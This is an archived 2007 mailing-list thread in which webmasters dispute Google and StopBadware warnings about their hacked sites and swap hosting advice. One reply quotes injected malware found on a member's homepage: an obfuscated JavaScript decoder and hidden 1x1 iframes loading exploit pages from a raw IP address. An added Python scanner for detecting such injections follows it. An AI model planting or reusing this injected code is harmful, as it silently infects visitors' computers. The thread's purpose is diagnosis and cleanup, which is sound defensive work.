informing site admins first

bradc

Apr 19, 2007, 1:24:20 PM
to stopbadware
Why couldn't Google and/or StopBadware alert site admins *before*
flagging their sites? I only learned the other day that my site,
bradcook.net, was flagged because someone had done a Google search on
my name. I have no idea how long it had been that way. I checked my
index.html page and, sure enough, the offending java code was there,
so I immediately deleted it and changed my password to something
completely random (unfortunately, my password had been, admittedly,
something that probably could have been cracked via a dictionary
attack).

If I had been alerted first, though, I could have taken care of it
immediately and not been stuck with a warning that could take weeks,
if not months, to remove. My email address and phone number are both
on the site's front page. I would have happily complied immediately.

jac...@gmail.com

Apr 19, 2007, 2:15:29 PM
to stopb...@googlegroups.com
On 4/19/07, bradc <br...@bradcook.net> wrote:
> Why couldn't Google and/or StopBadware alert site admins *before*
> flagging their sites?

How did you find out about your interstitialed google listing? I
remember hearing a while back that they would retake into
consideration the idea of letting webmasters know, despite the
difficulties of procuring any sort of legitimate contact information.

The answer to your question is that if Google doesn't blacklist your
site when it knows there is malware (intentionally or not on the site's
part), Google becomes ethically responsible for distributing malware.

If Google truly attempts to follow their motto, they are obligated to
inform webmasters. The archives demonstrate StopBadware's hesitation
over contacting the ISP (I assume this is the web host). Why? Surely
they aren't so ornery as to lose customers over a resolvable issue.
And isn't the problem often with the host to begin with? It seems the
web host would also be in a good technical position to help inexpert
webmasters, possibly making StopBadware's job easier.

-jake

bradc

Apr 19, 2007, 5:09:19 PM
to stopbadware
As I said, I found out about it because someone did a search on my
name and saw the warning. (Yes, I suppose he visited my site first
before emailing me; I told him later about what happened, so he knows
his computer could be affected by this.)

I have to admit I don't have a ton of confidence in my hosting
company, iPowerWeb. I've thought about switching, but I hate to deal
with the 2-3 days of email blackout while the DNS addresses
repopulate. I told an iPowerWeb rep about what happened and they
didn't seem too concerned. I am not a very experienced Webmaster, so
I'm tempted to find someone else who can host my site and be more
helpful, even if it costs me more money.

Any suggestions for good hosting companies are welcome.

Thanks.

- Brad

victoriav

Apr 19, 2007, 6:38:47 PM
to stopbadware
Hi Brad

I lost confidence in my host also, and moved 8 websites after the
hacking and planting of bad codes on one of my sites. The host/server
where the intrusion occurred used to be owned by a man who was really
on top of things. I wonder if any host is truly immune to hackings -
but this first guy caught everything immediately - and he sent out
emails to inform his clients when an attempt occurred. I think his
expertise held them at bay and he kept us safe. He then sold his
server to 2 people who were not as experienced. I ask myself, (and
should have asked them) why didn't they inform us when they realized
the ISP was hacked into, and someone ran software that gathered
usernames and passwords, which enabled the hackers to plant bad codes
on several sites on 3 different servers. Had the new owners let us
know, we could have nabbed it immediately.

I had 2 other hosts at the same time - bigger ones. So I now moved
those sites to one of them. I think it's a good idea to ask all of
these security questions before you choose a host. I never did - but
I would definitely choose security first should I move again. I would
ask what type of security they have in force and if they can catch
intruders before they manage to get in and do any damage. Ask if they
keep clients informed of attempts or break-ins.

I use hostgator.com and hostmonster.com. I have not had any problems
with either of them, but recently needed tech support with one of the
sites I have on hostgator.com. They are pretty good and fast to reply
to emails. You can also phone them, which is a plus. I think it's
best to stick with a larger, well established host. Thus far, none of
the sites have been down. Hostgator.com recently upgraded ISPs too
for more efficiency, but it didn't affect the websites. They sent out
emails to alert everyone beforehand. To me, this is a sign of a good
host. I hope :-)

I am also going to make sure I set good passwords and change them from
time to time. I met some nice people on this board, and we keep in
touch. Stopbadware sent some helpful links to one member here, who
passed them on to me. They are security measures you can take. I'll
pass them on. One thing we all learned is to take better
precautions. Once you get over the initial shock of being flagged,
you realize these people are in it for the good, and when your site is
clean, they'll remove the warning. We're all in this together, and
working together is good. Hang in there and things will be ok.


Victoria

jac...@gmail.com

Apr 19, 2007, 7:02:25 PM
to stopb...@googlegroups.com
On 4/19/07, victoriav <victo...@gmail.com> wrote:
> I use hostgator.com and hostmonster.com. I have not had any problems
> with either of them, but recently needed tech support with one of the
> sites I have on hostgator.com. They are pretty good and fast to reply
> to emails. You can also phone them, which is a plus. I think it's
> best to stick with a larger, well established host. Thus far, none of
> the sites have been down. Hostgator.com recently upgraded ISPs too
> for more efficiency, but it didn't affect the websites. They sent out
> emails to alert everyone beforehand. To me, this is a sign of a good
> host. I hope :-)

I've also heard good things about (http://hostgator.com). I use
(http://www.nearlyfreespeech.net), which is good for my nearly
no-traffic site. (http://whreviews.com) looks like a reliable site for
web host reviews.

I wonder if you guys at Stop Badware might have any shareable data on
particularly bad web hosts, as far as malware and insecurity goes?

-jake

Erica George

Apr 19, 2007, 7:44:58 PM
to stopb...@googlegroups.com
Hi Jake,

We're actually researching web hosts right now. We should have some preliminary data to share in the near future. We're also hoping we'll be able to work with hosting providers and help them to address these issues proactively, because as you note web hosts are in a great position not only to increase security for their hosted sites, but to educate webmasters about best security practices on their ends (from secure passwords to updating software).

Erica
StopBadware staff

victoriav

Apr 22, 2007, 7:04:10 PM
to stopbadware
Hi Erica

Involving hosts is a wonderful idea, as the host is basically the root
of it all. Having a secure host will help us tremendously. I just
wanted to share something about my second host. I gave great feedback
about hostgator.com, but today I encountered a php database issue
with my php mailing list. I was able to call hostmonster.com on the
phone (my second hosting company), get a tech online within a few
moments, and he actually had the knowledge to fix my database, which
is extremely rare as most hosts say they are not responsible for
anything in cpanel. This doesn't guarantee that every tech will have
that expertise, but I wanted to let others know that hostmonster.com
gives fabulous customer service and I recommend them.

Victoria

Larry Launstein Jr

Apr 23, 2007, 9:58:37 PM
to stopbadware
I'm not surprised by iPower's response or lack thereof. Durand
Railroad Days is hosted by them, and I have been trying to get them
off for the last couple of years.

I and all but them left iPower because iPower got a bit too inflated
for their own good.

I sent them an e-mail insisting that the problem be addressed
immediately.

beckerel...@yahoo.com

Apr 23, 2007, 10:57:18 PM
to stopbadware
During a routine checkup of our web site www.beckerelectronics.com we
noticed that our web site was flagged by Google, we have checked our
web pages and found no badware, we have sent numerous emails to
stopbadware.org also Google and got no response, actually two emails
that had nothing to do with our request. Here is a copy of the email
from stopbadware.org

First email from app...@stopbadware.org

To: Beckerel...@yahoo.com
Subject: Re: Please Review our web site "www.beckerelectronics.com"
Date: Thu, 19 Apr 2007 16:09:28 -0400 (EDT)
From: app...@stopbadware.org

StopBadware.org no longer accepts appeals submitted via email. If you
would like us to review the inclusion of your site in the Badware
Website Clearinghouse, please go to http://stopbadware.org/home/review
to fill out a Request for Review form.

The StopBadware Team

----------------------
second Email was sent to: con...@stopbadware.org, on this email we
requested they review our web site and got this email

To:beckerel...@yahoo.com
Subject: Re: Badware???? www.beckerelectronics.com
Date: Wed, 18 Apr 2007 13:53:18 -0400 (EDT)
From: con...@stopbadware.org

Thank you for contacting Stopbadware.org. Your input helps us build a
community and resources to help us stop this growing threat. Your
comments and suggestions are welcome.

Unfortunately, we receive so much feedback that we may not have time
to respond to every suggestion and question, though we do read all of
it.

If you want to participate and become part of this community, learn
how to get involved by going here:

http://www.stopbadware.org/home/get_involved

If you are looking for technical support with a badware issue,
stopbadware.org does not offer direct support. Please visit our 'How
do I get rid of badware' section for some helpful links:

http://www.stopbadware.org/home/help%2Fhelp_remove

Stopbadware.org does not currently endorse any sites or products, but
we do want to point you in the right direction so that you can find
the resources you need to make informed decisions about removing these
programs.

Thank You,
The Stopbadware.org Team
----------------------

At this time I don't even think that stopbadware.org has the capacity
to check all flagged websites and I'm not sure we even get any
results, our web site still shows in the first or second place on most
search engines and still first on google with flagged message, I'm not
sure what the damage will be and how this will affect our revenue and
reputation of our web site, but someone has to be responsible for lost
revenue. If we don't get any response our next option is to remove our
web pages from google permanently.
Best regards
Vic


Panayiotis Mavrommatis

Apr 23, 2007, 11:54:52 PM
to stopbadware
I just viewed the source of your main page. Towards the bottom there's
some obfuscated JavaScript and iframes:

<script language="JavaScript">e = '0x00' + '5F';str1 = "%E4%BC%B7%AA
%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7%BC%BC
%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC
%B0%E6%F1%F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE
%C0%A9%B7%BC%AC%B8%E3%EF%C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE
%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2";str=tmp='';for(i=0;i<str1.length;i+=3)
{tmp = unescape(str1.slice(i,i+3));str=str
+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</
script>
<iframe src='http://81.95. 148.35/upload/pic/' width=1 height=1></
iframe>
<iframe src='http://81.95. 148.35/upload/12343/new111.php?adv=168'
width=1 height=1></iframe>

This code fetches the two URLs from a remote server in two tiny
(1x1 pixel) frames. (I put a space so you don't accidentally click on
them). The URLs deliver exploits and lots of malware to unprotected
visitors. If you visited your site with IE and Windows, you might want
to virus scan your PC as well.

Follow the steps described on stopbadware's help pages to
- remove this code
- investigate how this code was inserted in your website
- make sure your server is secure and this won't happen again
- file for an appeal (review).

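An added example, not part of the original thread: one way a webmaster could scan their own pages for the two patterns described in the post above (1x1 iframes and a script that decodes a string and passes it to document.write). The rule names, thresholds and the sample page are assumptions made for this illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristics: a long run of %XX escapes, or document.write() fed by a decoder.
PCT_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}\s*){20,}")
DECODERS = ("unescape(", "String.fromCharCode(", "eval(")
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")

def _tiny(value):
    # True for a width/height of 0 or 1 (optionally with a px suffix).
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value or "")
    return bool(m) and int(m.group(1)) <= 1

def _host(src):
    try:
        return urlparse(src).hostname or ""
    except ValueError:  # malformed URL, e.g. unbalanced IPv6 brackets
        return ""

class InjectionScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # (line, rule, detail)
        self._script = None  # (start_line, [chunks]) while inside <script>

    def handle_starttag(self, tag, attrs):
        a, line = dict(attrs), self.getpos()[0]
        if tag == "script":
            self._script = (line, [])
        elif tag == "iframe":
            src = a.get("src") or ""
            if _tiny(a.get("width")) or _tiny(a.get("height")):
                self.findings.append((line, "hidden-iframe", src))
            if IPV4.fullmatch(_host(src)):
                self.findings.append((line, "iframe-raw-ip", src))

    def handle_data(self, data):
        if self._script:
            self._script[1].append(data)

    def handle_endtag(self, tag):
        if tag != "script" or not self._script:
            return
        line, chunks = self._script
        self._script = None
        body = "".join(chunks)
        used = [d for d in DECODERS if d in body]
        if PCT_RUN.search(body) or ("document.write" in body and used):
            detail = ",".join(used) or "percent-encoded blob"
            self.findings.append((line, "obfuscated-script", detail))

def scan(html):
    s = InjectionScanner()
    s.feed(html)
    s.close()
    return sorted(s.findings)

# Constructed sample page; 192.0.2.10 is a documentation-only address.
SAMPLE = """<html><body>
<h1>Shop</h1>
<iframe src="/map.html" width="400" height="300"></iframe>
<script>var s="%3Cb%3E";document.write(unescape(s));</script>
<iframe src='http://192.0.2.10/upload/pic/' width=1 height=1></iframe>
</body></html>
"""

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

Run scan() over the contents of every page file pulled from the server, not only index.html; findings are leads for manual review of the reported line, not a verdict.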

Larry Launstein Jr

Apr 25, 2007, 3:11:07 PM
to stopbadware
I think Google and Stop Badware.com have a good idea, but I think they
need to inform the webmaster before putting up a warning, and also
give the webmaster the information they need to get rid of the
offending stuff.

All the sites I do have my company's name with a link back to my site.
There is no excuse why I could not have been contacted directly.

What has happened is that Durand Railroad Days now has a black mark
next to its good name just because some jerk found a way to hack into
iPowerWeb. We designers should not have to pay the price for this, nor
should our clients. It is a horrible business practice both Google and
Stop Badware have embarked on. This is a potential lawsuit waiting to
happen.

What has happened is unfair to Durand Railroad Days, and to me.

pablo....@gmail.com

Apr 25, 2007, 3:42:46 PM
to stopb...@googlegroups.com
"I think Google and Stop Badware.com have a good idea, but I think they need
to inform the webmaster before putting up a warning, and also give the
webmaster the information they need to get rid of the offending stuff."
--------------------------

Many of us readers, users, and web developers think as you do too.

In fact, personally I couldn't agree more.

However when I posted such an idea I was responded with both ignorance and
arrogance.
http://groups.google.com/group/stopbadware/browse_thread/thread/bf3c991913717e4d/0744836e1f61ec14?lnk=gst&q=standard&rnum=6#0744836e1f61ec14

Some people even think this unexpected workflow from Stopbadware is
intentional, making web advertising only good if it comes from "adwords" /
"adsense".

Personally I only can affirm, that current method is certainly destructive
for many Nonbadware sites.

Hope somebody listens to you at stopbadware.

I really like to think they are noble people working for safer browsing and
not anything else.

Pablo Silvio Esquivel
A Higher Standard Webmaster
www.logosbr.com/

Larry Launstein Jr

Apr 25, 2007, 4:18:11 PM
to stopbadware
A big lawsuit would wake everyone up big time.


beckerel...@yahoo.com

Apr 25, 2007, 10:49:18 PM
to stopbadware
Hi Erica,
Can you explain how your staff can check around 70,000 flagged
web sites? Our site www.beckerelectronics.com was flagged and we still
got no result, I was told I should get an email in 2 days and that
also passed,
Vic
-------------------

Erica George

Apr 26, 2007, 10:39:37 AM
to stopb...@googlegroups.com
Hi Vic,

I'm not sure where you were told that you would be emailed in 2 days. We make every effort to process sites that appeal within 10 business days, though a handful of sites have had more complex situations that required further testing beyond that. It is true that if a site is already 100% clean when it is first re-tested, the turnaround time is usually quite quick, and it usually is no more than 2 business days. But no-one at StopBadware would have made the promise that your review would be processed that quickly, because until a site is actually re-tested we have no way of knowing if it will be one of the quick already-clean sites or a still-infected site that will take longer. I'm happy to look into the status of your site's review.

I'd also like to clarify something about the reviews. No, we absolutely are not reviewing 70,000 sites. That's the number of sites in the Clearinghouse. Some of them are intentionally distributing badware and have no desire to appeal. Some of them are link farms who would possibly prefer not to distribute badware, but whose shady business models rely on linking to huge numbers of other sites without taking time to verify their safety. Many of the sites listed in the Clearinghouse are the URLs actively hosting badware to which innocent sites that have been hacked unintentionally link. In any case, though our load spiked higher in March, we're currently receiving more like 100 to 125 requests for review per day. We now have a technical system that can handle the load - when the first influx of hacked sites began, we were working with a technical system designed to handle more like 100 sites per month. We also now have plenty of well-trained interns to staff our testing. So no, we aren't processing 70,000 sites at once. But we are processing over 3,000 reviews a month, and have capacity to process more.

Erica
StopBadware staff


Bu33411

Apr 26, 2007, 2:43:13 PM
to stopbadware
Pablo, I worked in Harvard back in 1984-85, in High Energy Physics
Department 42 Oxford street, Cambridge Mass, and quit after a while. We
are the world's largest Garbage producer, HARVARD PRODUCES THE MOST,
some examples are Enron executives? So if Harvard is involved then
forget about it, not to mention the 2 nerds from google that are
billionaires.

-------------------------------------------------------------------------------------


Larry Launstein Jr

Apr 26, 2007, 5:04:27 PM
to stopbadware
Erica:

Thank you and your organization for removing the flag from Durand
Railroad Days. It was never their intention, nor mine, to promote the
spread of badware. It just upset me a lot that they had this happen
just before their event. It was also no fault of my own, nor Durand
Railroad Days, Inc., for some jerk hacking into the system.


beckerel...@yahoo.com

May 2, 2007, 10:33:10 PM
to stopbadware
Hi Erica,
I sent you 2 emails and got no response, I still have the original
email that I received from one of your colleagues that said it will take
one or two days, according to your estimate the 10 days period is also
passed, as I mentioned in my email I wouldn't think that your
organisation could handle all the load and I was correct since you can
not even reply to an email, we have registered a new website and we
will run it against stopbadware.org and google, your name will be the
first in our list, at this point we do not care if you remove our web
site from list or not since we will remove our site from google, the
general public should consider you illegitimate since no one requested
for your service, I agree with Bu33411 post, we do produce the world's
largest garbage and Harvard definitely produces the Most. At this point
you need one of your own that likes to make a fame to stand against
you.

Vic

PS. I'm sure this page will be shown by google and millions will see
the post
==================================================================================================


beckerel...@yahoo.com

May 2, 2007, 10:56:20 PM
to stopbadware
Brad, remove your web site from Google, they flagged so many web sites
that have nothing to do with badware, I actually check their flagged
web sites and had no problems with badware, usually the sites that
contain badware are porn sites and hack sites, anyone who visits these
sites already knows they have a chance to get a virus, according to many
experts stopbadware will not last long and they are not capable to
help you in any way, our site does not have any badware and was
flagged by google, we have sent numerous messages to stopbadware and
got no response, I have personally sent many emails to Erica George
that claims to be one of the stopbadware staff and did not get any
response.
Vic
www.beckerelectronics.com

PS. there is an alternate way that you can have your site listed on
google in less than 2-3 days in top ten,
===============================================================================================
